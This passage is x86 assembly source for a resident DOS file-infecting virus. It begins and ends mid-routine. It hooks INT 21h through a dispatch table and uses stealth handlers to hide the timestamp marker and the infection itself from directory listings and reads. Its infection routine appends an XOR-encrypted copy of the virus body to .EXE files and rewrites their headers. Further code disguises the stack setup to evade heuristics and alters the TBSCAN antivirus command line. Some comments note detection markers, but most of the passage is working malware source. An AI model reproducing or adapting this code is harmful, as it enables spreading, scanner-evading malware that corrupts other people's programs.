MOV AX, 3D02h ; Open file r/w.
CALL DosInt
JC Abort_Clean
XCHG BX, AX
CALL Clean_Handle ; Clean it.
MOV AH, 3Eh ; Close file.
CALL DosInt
Abort_Clean:
CALL Pop_All
JMP Continue
; INT 21h AH=40h (write to handle) trap. Before the program's write goes
; through, the virus body is stripped from the target file so the write lands
; on the restored host image. BX = file handle as supplied by the caller.
; Clean_Handle leaves the file pointer and all registers as it found them;
; control then chains to the original INT 21h via Continue.
Clean_By_Handle:
CALL Clean_Handle
JMP Continue
;-------------------------------------------------------------------------
; Clean_Handle - restore the original host file through an open handle.
;
; In:   BX = file handle; must be open for read/write (the seek/write calls
;            below fail otherwise, and the failures are not checked).
; Out:  nothing; all registers preserved via Push_All/Pop_All.
; Uses: FileTime, FileDate, Header (CS-relative data), Old_Pos through
;       Save_File_Pos/Restore_File_Pos. INT 24h is hooked for the duration.
;
; Infection marker (useful for detection): the seconds field of the DOS time
; word (bits 0-4, in 2-second units) equals 30, i.e. "60 seconds", a value no
; normally written file carries. Files whose stamp lacks the marker are left
; untouched (No_Del).
; Layout assumed by the code: the 24-byte original .EXE header sits in the last
; 24 bytes of the infected file, and the appended data occupies
; (Virus_Size + 16 + 24) bytes at the end of the file.
;-------------------------------------------------------------------------
Clean_Handle:
CALL Push_All ; Save every register; restored at No_Del.
CALL Hook_i24h ; Install the dummy critical-error handler
; (presumably so disk errors never prompt the user).
PUSH CS
POP DS ; DS = CS: FileTime/FileDate/Header are CS-relative.
CALL Check_Handle ; ZF set when BX is a usable file handle (inferred from the JNZ).
JNZ No_Del
MOV AX, 5700h ; Get file date/time: CX = time, DX = date.
CALL DosInt
MOV FileTime, CX ; Keep both words for the 5701h restore below.
MOV FileDate, DX
AND CL, 00011111b ; Isolate the seconds field (bits 0-4).
CMP CL, 00011110b ; 30 * 2 s = "60 seconds": the infection marker?
JNE No_Del ; Not marked -> nothing to clean.
CALL Save_File_Pos ; Caller's file pointer is restored at the end.
CALL Go_End_File ; DX:AX = file size.
SUB AX, 24 ; DX:AX = size - 24 = offset of the stored original header.
SBB DX, 0
MOV CX, DX ; CX:DX = that offset for the seek below.
XCHG DX, AX
MOV AX, 4200h ; Seek (from start) to the stored original header.
CALL DosInt
MOV AH, 3Fh ; Read the 24-byte original header into Header.
MOV CX, 24
MOV DX, OFFSET Header
CALL DosInt
CALL Go_End_File ; DX:AX = file size again.
SUB AX, (Virus_Size + 16 + 24) ; DX:AX = start of the appended data.
SBB DX, 0
MOV CX, DX ; CX:DX = that offset.
XCHG DX, AX
MOV AX, 4200h ; Seek (from start) to where the host originally ended.
CALL DosInt
MOV AH, 40h ; Write 0 bytes: DOS truncates the file at the current position,
XOR CX, CX ; which drops the appended body and stored header.
CALL DosInt
CALL Go_Begin_File ; Offset 0.
MOV AH, 40h ; Put the original 24-byte header back in place.
MOV CX, 24
MOV DX, OFFSET Header
CALL DosInt
MOV AX, 5701h ; Set date/time back to the saved values ...
MOV CX, FileTime
MOV DX, FileDate
AND CL, 11100000b ; ... with the seconds field zeroed, i.e. marker removed.
CALL DosInt
CALL Restore_File_Pos ; Back to the caller's file pointer.
No_Del: CALL Unhook_i24h
CALL Pop_All
RETN
; Check whether a file's timestamp carries the infection marker.
; In:  BX = file handle.
; Out: ZF set when the seconds field of the time word equals 30 ("60 s"),
;      i.e. the file is marked as infected. AX, CX, DX preserved.
; The flags come from the final CMP; DosInt's own CF result is not returned.
Check_Stamp:
PUSH AX
PUSH CX
PUSH DX
MOV AX, 5700h ; Get time (CX) and date (DX) stamp.
CALL DosInt
AND CL, 00011111b ; Keep only the seconds field.
CMP CL, 00011110b ; 30 -> "60 seconds" marker (sets ZF for the caller).
POP DX
POP CX
POP AX
RETN
; INT 21h AX=5700h (get file date/time) trap: hides the infection marker.
; The original handler runs first; then, if the call succeeded, stealth is on
; (Status bit 1) and the handle's stamp carries the marker, the seconds field
; of the returned CL is cleared so the caller sees a normal timestamp.
; In:  BX = file handle, AX = 5700h (as issued by the caller).
; Out: CX/DX as returned by DOS, CL possibly with seconds zeroed; flags as
;      left by DosInt (CF on error). CS:Temp is used as scratch.
; Returns with RETF 2: pops CS:IP and discards the flags word the INT
; pushed, so the DosInt flags (restored by POPF) reach the caller.
Stealth_Time:
CALL DosInt ; Let DOS fill CX/DX.
PUSHF ; Keep DosInt's CF across the check below.
PUSH CX
MOV CS:Temp, CL ; Temp = low byte of the time word.
JC No_Stealth_Time ; DOS error -> return it unchanged.
TEST CS:Status, 00000010b ; Stealth mode off?
JZ No_Stealth_Time
CALL Check_Stamp ; ZF set when the stamp is marked.
JNZ No_Stealth_Time
AND CS:Temp, 11100000b ; Zero the seconds field (bits 0-4).
No_Stealth_Time:
POP CX
POPF
MOV CL, CS:Temp ; Hand back the (possibly masked) low byte.
RETF 2
; Record the current file pointer of handle BX in CS:Old_Pos.
; In:  BX = file handle.
; Out: Old_Pos = high word, Old_Pos+2 = low word of the position
;      (layout matched by Restore_File_Pos). AX, CX, DX clobbered.
Save_File_Pos:
MOV AX, 4201h ; Seek 0 bytes from current -> DX:AX = current position.
XOR CX, CX
CWD ; DX = 0 (AX is positive).
CALL DosInt
MOV CS:Old_Pos, DX ; High word.
MOV CS:Old_Pos+2, AX ; Low word.
RETN
; Seek handle BX back to the position stored by Save_File_Pos.
; In:  BX = file handle; CS:Old_Pos as written by Save_File_Pos.
; Out: AX, CX, DX clobbered; DosInt's CF not checked.
Restore_File_Pos:
MOV AX, 4200h ; Seek from start of file.
MOV CX, CS:Old_Pos ; CX = high word.
MOV DX, CS:Old_Pos+2 ; DX = low word.
CALL DosInt
RETN
; Seek handle BX to offset 0.
; In:  BX = file handle.
; Out: DX:AX = 0 on success; CX = 0. DosInt's CF not checked.
Go_Begin_File:
MOV AX, 4200h ; Seek from start ...
XOR CX, CX ; ... to CX:DX = 0.
CWD
CALL DosInt
RETN
;-------------------------
; Seeks to the end of the file.
;
; In:  BX = filehandle
; Out: DX:AX = filesize (the resulting position);
;      CX = 0; DosInt's CF not checked.
;-------------------------
Go_End_File:
MOV AX, 4202h ; Seek from end ...
XOR CX, CX ; ... by CX:DX = 0.
CWD
CALL DosInt
RETN
; Dispatch table for the INT 21h functions the virus intercepts. Each entry is
; two words: the AH:AL value to match, then the handler offset. A subfunction
; byte (AL) of 0FFh is treated as a wildcard, i.e. only AH is compared.
; NewInt21h walks this table; a zero high byte (the final DW 0) ends it.
; The Residency_Check entry is the "are-you-there" request, answered by
; Return_Call with AX = Marker_Mem (a memory-residency detection point).
Functions:
DW 11FFh ; Findfirst (FCB).
DW Stealth_Filesize_FCB
DW 12FFh ; Findnext (FCB).
DW Stealth_Filesize_FCB
DW 4EFFh ; Findfirst (handle).
DW Stealth_Filesize
DW 4FFFh ; Findnext (handle).
DW Stealth_Filesize
DW 4B00h ; Execute file.
DW Init_Exec
DW 4B01h ; Load but not execute.
DW Clean_By_File
DW 5700h ; Get filetime.
DW Stealth_Time
DW 3CFFh ; Create/truncate file.
DW Check_Infect
DW 3DFFh ; Open file.
DW Check_Infect
DW 3FFFh ; Read file (handle).
DW Stealth_File_Read
DW 40FFh ; Write to file (handle).
DW Clean_By_Handle
DW 42FFh ; lseek file.
DW Stealth_Fileseek
DW 41FFh ; Delete file.
DW Check_Infect
DW 4CFFh ; Program terminate.
DW Switch_Stealth_On
DW 6CFFh ; Extended open/create.
DW Check_Infect
DW 43FFh ; Get file-attributes.
DW Check_Infect
DW Residency_Check ; Are-You-There call (AX value defined elsewhere).
DW Return_Call
DW 0 ; End of table (zero high byte stops the scan).
; Resident INT 21h entry point. Scans the Functions table for an entry
; matching AH (and AL unless the entry's AL is 0FFh) and jumps to its handler
; with all caller registers intact (SI/BX are restored first). Unmatched
; calls chain to the original handler through the far pointer at CS:Int21h.
; Continue is also the shared exit used by the handlers.
; Handlers are entered with the caller's stack layout, i.e. as if they were the
; interrupt handler themselves; they must end with IRET/RETF 2 or JMP Continue.
NewInt21h:
PUSH SI
PUSH BX
MOV SI, OFFSET Functions ; SI -> current table entry.
Next_Function:
MOV BX, CS:[SI] ; BH = function (AH), BL = subfunction (AL) to match.
OR BH, BH ; End of table reached?
JZ End_Table_Reached ; Then abort.
CMP BH, AH ; Function match?
JNE Another
CMP BL, 0FFh ; Don't compare subfunction?
JE Exec_Function ; Then JMP to routine.
CMP BL, AL ; Subfunction right?
JE Exec_Function ; Then JMP to routine.
Another:
ADD SI, 4 ; Next entry (two words).
JMP Next_Function ; Repeat loop.
End_Table_Reached:
POP BX
POP SI
Continue: JMP DWORD PTR CS:Int21h ; Chain to the original INT 21h.
Exec_Function:
MOV BX, CS:[SI+2] ; Handler offset from the entry's second word.
MOV CS:Ret_Add, BX ; Parked in memory so BX/SI can be restored first.
POP BX
POP SI
JMP CS:Ret_Add ; Near indirect JMP to the handler.
; === Answer the "are-you-there" call: AX = Marker_Mem tells a second copy of
; the virus that it is already resident. Returns straight to the caller via
; IRET (original INT 21h not called). ===
Return_Call:
MOV AX, Marker_Mem
IRET
; INT 21h AH=4Ch (program terminate) trap. Reloads Status from Init_Status,
; re-arming whatever mode bits Init_Exec cleared for the program that is now
; ending, then chains to the original handler via Continue.
Switch_Stealth_On:
PUSH AX
MOV AL, CS:Init_Status
MOV CS:Status, AL
POP AX
JMP Continue
; INT 21h AX=4B00h (execute program) trap.
; In:  DS:DX = path of the program being executed, ES:BX = EXEC parameter
;      block (both as supplied by the caller).
; 1. If the path matches an entry of the No_Active table, Status is cleared
;    (virus goes inactive while that program runs; Switch_Stealth_On restores
;    it at termination).
; 2. If the path matches the TBSCAN entry, the Parameters string is appended
;    to the program's command tail inside the EXEC parameter block.
; Registers are restored by Pop_All; control then FALLS THROUGH into
; Check_Infect (next routine), which handles the file being executed.
; Search_Table contract (inferred from use): DS:SI = path, DI = table,
; CX = entry count, ZF set on a match; No_Active entries are 7 bytes each.
Init_Exec:
CALL Push_All
; Should we be inactive during the run of this program?
; Otherwise it causes problems:
; ARJ.EXE   timestamp incorrect.
; PKZIP.EXE wrong filesizes, etc.
MOV SI, DX ; DS:SI = program path.
MOV DI, OFFSET No_Active
MOV CX, (OFFSET End_No_Active - OFFSET No_Active) / 7 ; Entry count.
CALL Search_Table
JNZ No_Disable
AND CS:Status, 00000000b ; Clear every mode bit (infect and stealth).
No_Disable:
MOV DI, OFFSET TBSCAN ; Add parameters to TBSCAN's command line?
MOV CX, 1 ; Single-entry table.
CALL Search_Table
JNZ Not_TbScan
MOV DI, ES:[BX+2] ; ES:DI = far pointer to the command tail
MOV ES, ES:[BX+4] ; (offset at +2, segment at +4 of the parameter block).
MOV AL, ES:[DI] ; AL = current command-tail length byte.
CBW
ADD BYTE PTR ES:[DI], 6 ; Length grows by 6 (7 bytes copied below; presumably
; the 7th is the terminating CR, which DOS does not count).
INC DI ; Skip the length byte ...
ADD DI, AX ; ... and the existing text; DI -> append position.
PUSH CS
POP DS ; DS:SI = Parameters (CS-relative).
CLD
MOV SI, OFFSET Parameters
MOVSW ; Copy 7 bytes (3 words + 1 byte).
MOVSW
MOVSW
MOVSB
Not_TbScan:
CALL Pop_All ; Falls through into Check_Infect.
; === INFECTION ROUTINE ===
Check_Infect:
CALL Push_All
CALL Hook_i24h ; Dummy error-handler.
CMP AH, 6Ch ; Extended open/create?
JNE No_Ext_Open ; (used by F-Prot).
MOV DX, SI ; DX = SI.
No_Ext_Open:
TEST CS:Status, 00000001b ; Infect-mode on?
JZ JMP_Exit_i21h ; Abort when not.
MOV AX, 3D02h ; Open file for r/w.
CALL DosInt
JNC No_Open_Error
JMP_Exit_i21h: JMP Exit_Int_21h
DB 'Daddy-K-tit 2 Gallyon van Vessem'
No_Open_Error:
XCHG BX, AX ; BX = Handle.
CALL Check_Handle ; Filehandle?
JNZ Abort_Check
PUSH CS
POP DS
PUSH CS
POP ES
MOV AH, 3Fh ; Read header.
MOV CX, 24
MOV DX, OFFSET Header
CALL DosInt
JC Abort_Check ; If we can't read.
CALL Go_End_File
OR DX, DX ; > 64k?
JNZ Over_64k
CMP AX, 560 ; File too small?
JB Abort_Check
Over_64k:
CMP Mark, 'ZM' ; .EXE-file?
JNE Abort_Check ; Exit when not.
CMP Checksum, Marker_File ; Already infected?
JNE Infect_File
Abort_Check:
JMP Close_File
Infect_File:
MOV AX, 5700h ; Get filetime.
CALL DosInt
PUSH CX
PUSH DX
CALL Go_End_File
AND AX, 00001111b ; Filelength MOD 16.
MOV Padding, AX
OR AX, AX
JZ No_Padding
MOV AH, 40h ; Write padding bytes.
MOV CX, 16
SUB CL, AL
MOV Padding, CX
CALL DosInt
No_Padding:
CALL Go_End_File
PUSH DX ; Size host + padding.
PUSH AX
CLD ; Save old CS:IP.
MOV SI, OFFSET Init_IP
MOV DI, OFFSET Old_Entry
MOVSW
MOVSW
MOV AX, Init_SP ; Save old SS:SP.
MOV Old_Stack, AX
MOV AX, Init_SS
MOV Old_Stack+2, AX
IN AL, 40h ; Get random encryption-key.
MOV File_Key, AL
CLD ; Copy virus to buffer
XOR SI, SI ; for encryption.
MOV DI, OFFSET Buffer
MOV CX, Virus_Size
REP MOVSB
MOV SI, OFFSET Buffer
MOV CX, OFFSET End_Encrypted_File
Encrypt_Byte:
XOR BYTE PTR [SI], AL ; Encrypt ourself in buffer.
INC SI
LOOP Encrypt_Byte
MOV AH, 40h ; Append virus to host.
MOV CX, (Virus_Size + 16)
SUB CX, Padding
MOV DX, OFFSET Buffer
CALL DosInt
MOV AH, 40h ; Write original header
MOV CX, 24 ; to end of hostfile.
MOV DX, OFFSET Header
CALL DosInt
MOV AX, HeaderSize ; Calculate headersize.
MOV CX, 16
MUL CX
XCHG CX, AX
POP AX ; Length host + padding.
POP DX
SUB AX, CX ; Minus headersize.
SBB DX, 0 ; *** Causes a bug with ARJ
; by small files. > 512.
; Also with Invircible.
MOV CX, 16 ; In paragraphs.
DIV CX
MOV Init_CS, AX ; Store new CS.
MOV Init_IP, OFFSET START
DEC AX ; Anti-heuristic.
MOV Init_SS, AX
MOV Init_SP, (Virus_Mem_Size * 16)
CALL Go_End_File
MOV CX, 16 ; Filelength in paragraphs.
DIV CX
ADD AX, Virus_Mem_Size
MOV MinMem, AX
CALL Go_End_File
MOV CX, 512 ; 512 byte-pages.
DIV CX
OR DX, DX ; No rest?
JZ No_Round ; Then no round-off.
INC AX ; Round off.
No_Round: MOV Byte_Pages, AX
MOV MOD512, DX
MOV Checksum, Marker_File ; Mark as infected.
CALL Go_Begin_File
MOV AH, 40h ; Write updated header.
MOV CX, 24
MOV DX, OFFSET Header
CALL DosInt
MOV AX, 5701h ; Restore filedate.
POP DX
POP CX
AND CL, 11100000b ; Clear seconds.